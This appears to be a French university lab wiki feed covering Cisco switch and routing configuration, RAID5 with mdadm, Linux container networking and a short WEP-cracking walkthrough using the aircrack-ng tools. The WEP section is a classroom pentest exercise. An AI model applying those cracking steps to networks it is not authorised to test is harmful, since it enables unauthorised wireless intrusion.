 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Suite à une erreur de manipulation le /var est mort&lt;br /&gt;
&lt;br /&gt;
Pour réaliser la suite du TP j'ai recrée une VM Dionysos2, même addresse IP.&lt;br /&gt;
&lt;br /&gt;
Il faut donc éteindre la VM Dionysos pour éviter tout problème&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de sites (IPv4) ====&lt;br /&gt;
&lt;br /&gt;
==== Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49063</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49063"/>
				<updated>2018-12-21T09:51:18Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Le routage de sites (IPv4) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
